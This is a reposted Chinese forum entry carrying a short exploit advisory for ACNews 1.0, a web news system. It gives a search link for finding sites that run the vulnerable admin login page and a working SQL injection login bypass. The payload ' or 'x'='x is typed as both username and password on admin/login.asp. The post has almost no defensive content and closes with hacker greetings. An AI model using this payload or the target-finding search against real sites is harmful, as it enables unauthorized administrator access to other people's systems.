[转载]ACNews 1.0管理员验证绕过
信息来源:securitygurus team文章作者:LaMeR
# [url]http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search[/url]
# /str0ke
Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection
[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.
greetz to HaXoR & LOverboy
页:
[1]